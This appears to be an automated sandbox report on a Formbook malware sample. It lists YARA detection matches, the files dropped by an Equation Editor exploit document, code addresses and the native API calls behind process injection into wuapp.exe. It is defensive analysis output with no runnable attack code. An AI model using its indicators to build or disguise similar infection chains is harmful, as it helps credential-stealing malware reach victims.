Source: 5.2.dvukljmnr.exe.160000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.0.dvukljmnr.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.0.dvukljmnr.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.dvukljmnr.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.dvukljmnr.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.1181975220.0000000000120000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.1181975220.0000000000120000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.983836372.0000000000130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.983836372.0000000000130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.983901673.0000000000240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.983901673.0000000000240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.983955390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.983955390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.1181928628.0000000000090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.1181928628.0000000000090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.922358933.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.922358933.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000000.959911974.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000000.959911974.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.923111681.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.923111681.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000000.975797986.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000000.975797986.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.1182016973.0000000000190000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.1182016973.0000000000190000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.921486014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.921486014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\word.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\cssati[1].exe			Jump to dropped file

Source: Revised RFQ-PO180911.doc, type: SAMPLE	Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
Source: 6.0.dvukljmnr.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.0.dvukljmnr.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.dvukljmnr.exe.160000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.dvukljmnr.exe.160000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.0.dvukljmnr.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.0.dvukljmnr.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.dvukljmnr.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.2.dvukljmnr.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.1181975220.0000000000120000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.1181975220.0000000000120000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.983836372.0000000000130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.983836372.0000000000130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.983901673.0000000000240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.983901673.0000000000240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.983955390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.983955390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.1181928628.0000000000090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.1181928628.0000000000090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000000.922358933.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.922358933.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000000.959911974.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000000.959911974.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.923111681.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.923111681.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000000.975797986.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000000.975797986.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.1182016973.0000000000190000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.1182016973.0000000000190000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000000.921486014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.921486014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: C:\Users\user\AppData\Roaming\word.exe

Code function: 4_2_004032FA EntryPoint,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,

4_2_004032FA

Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 4_2_004047EE		4_2_004047EE
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 4_2_00406083		4_2_00406083
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: 5_2_009C0276		5_2_009C0276
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: 5_2_009C1A6F		5_2_009C1A6F
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: 5_2_009C4CC4		5_2_009C4CC4
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: 5_2_009BAC14		5_2_009BAC14
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: 5_2_009C2D97		5_2_009C2D97
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: 5_2_009C0D53		5_2_009C0D53
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: 5_2_009C3659		5_2_009C3659
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: 5_2_009B5FCE		5_2_009B5FCE
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: 5_2_009C07E1		5_2_009C07E1
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: 5_2_000F0A64		5_2_000F0A64
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: 6_2_00401026		6_2_00401026
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: 6_2_00401030		6_2_00401030
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: 6_2_0041E261		6_2_0041E261
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: 6_2_0041EB71		6_2_0041EB71
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: 6_2_0041E3DA		6_2_0041E3DA
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: 6_2_0041E4B4		6_2_0041E4B4
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: 6_2_00402D90		6_2_00402D90
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: 6_2_00409E4B		6_2_00409E4B
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: 6_2_00409E50		6_2_00409E50
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: 6_2_0041EEB5		6_2_0041EEB5
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: 6_2_0041D7DE		6_2_0041D7DE
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: 6_2_0041E79A		6_2_0041E79A
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: 6_2_00402FB0		6_2_00402FB0
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: 6_2_009C0276		6_2_009C0276
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: 6_2_009C1A6F		6_2_009C1A6F
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: 6_2_009C4CC4		6_2_009C4CC4
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: 6_2_009BAC14		6_2_009BAC14
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: 6_2_009C2D97		6_2_009C2D97
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: 6_2_009C0D53		6_2_009C0D53
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: 6_2_009C3659		6_2_009C3659
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: 6_2_009B5FCE		6_2_009B5FCE
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: 6_2_009C07E1		6_2_009C07E1
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: 6_2_00A0E0C6		6_2_00A0E0C6
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: 6_2_00A3D005		6_2_00A3D005
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: 6_2_00A13040		6_2_00A13040
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: 6_2_00A2905A		6_2_00A2905A
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: 6_2_00A0E2E9		6_2_00A0E2E9
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: 6_2_00AB1238		6_2_00AB1238
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: 6_2_00AB63BF		6_2_00AB63BF
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: 6_2_00A0F3CF		6_2_00A0F3CF
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: 6_2_00A363DB		6_2_00A363DB
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: 6_2_00A12305		6_2_00A12305
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: 6_2_00A5A37B		6_2_00A5A37B
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: 6_2_00A17353		6_2_00A17353
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: 6_2_00A45485		6_2_00A45485
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: 6_2_00A21489		6_2_00A21489
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: 6_2_00A9443E		6_2_00A9443E
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: 6_2_00A4D47D		6_2_00A4D47D
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: 6_2_00A2C5F0		6_2_00A2C5F0
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: 6_2_00A1351F		6_2_00A1351F
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: 6_2_00A56540		6_2_00A56540
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: 6_2_00A14680		6_2_00A14680
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: 6_2_00A1E6C1		6_2_00A1E6C1
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_02011238		8_2_02011238
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01F6E0C6		8_2_01F6E0C6
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01F8905A		8_2_01F8905A
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01F73040		8_2_01F73040
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01F9D005		8_2_01F9D005
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01F963DB		8_2_01F963DB
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01F6F3CF		8_2_01F6F3CF
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01FBA37B		8_2_01FBA37B
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01F77353		8_2_01F77353
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01F72305		8_2_01F72305
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01F6E2E9		8_2_01F6E2E9
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01F8C5F0		8_2_01F8C5F0
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_02012622		8_2_02012622
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01F7351F		8_2_01F7351F
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01F81489		8_2_01F81489
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01FA5485		8_2_01FA5485
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01FA57C3		8_2_01FA57C3
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01F7C7BC		8_2_01F7C7BC
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01FF579A		8_2_01FF579A
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01F7E6C1		8_2_01F7E6C1
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01F74680		8_2_01F74680
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01F869FE		8_2_01F869FE
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01F729B2		8_2_01F729B2
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_02023A83		8_2_02023A83
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01FF5955		8_2_01FF5955
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01F9286D		8_2_01F9286D
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_0201CBA4		8_2_0201CBA4
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01F7C85C		8_2_01F7C85C
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01FFDBDA		8_2_01FFDBDA
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_0200F8EE		8_2_0200F8EE
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01F97B00		8_2_01F97B00
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_0201098E		8_2_0201098E
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01F7CD5B		8_2_01F7CD5B
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01FA0D3B		8_2_01FA0D3B
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01F9DF7C		8_2_01F9DF7C
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01F80F3F		8_2_01F80F3F
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01F8EE4C		8_2_01F8EE4C
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01FA2E2F		8_2_01FA2E2F
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_0200FDDD		8_2_0200FDDD
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_000AE79A		8_2_000AE79A
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_000AD7DE		8_2_000AD7DE
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_000AEB71		8_2_000AEB71
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_00092D90		8_2_00092D90
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_00099E4B		8_2_00099E4B
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_00099E50		8_2_00099E50
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_000AEEB5		8_2_000AEEB5
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_00092FB0		8_2_00092FB0

Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: String function: 009B2233 appears 42 times
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: String function: 00A0DF5C appears 51 times
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: String function: 00A53F92 appears 51 times
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: String function: 00A5373B appears 87 times
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: String function: 009AF1E0 appears 48 times
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: String function: 01FDF970 appears 81 times
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: String function: 01F6DF5C appears 107 times
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: String function: 01F6E2A8 appears 38 times
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: String function: 01FB373B appears 238 times
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: String function: 01FB3F92 appears 108 times

Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: 6_2_0041A350 NtCreateFile,		6_2_0041A350
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: 6_2_0041A400 NtReadFile,		6_2_0041A400
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: 6_2_0041A480 NtClose,		6_2_0041A480
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: 6_2_0041A530 NtAllocateVirtualMemory,		6_2_0041A530
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: 6_2_0041A34A NtCreateFile,		6_2_0041A34A
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: 6_2_0041A3FB NtReadFile,		6_2_0041A3FB
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: 6_2_0041A47B NtClose,		6_2_0041A47B
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: 6_2_00A000C4 NtCreateFile,LdrInitializeThunk,		6_2_00A000C4
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: 6_2_00A00078 NtResumeThread,LdrInitializeThunk,		6_2_00A00078
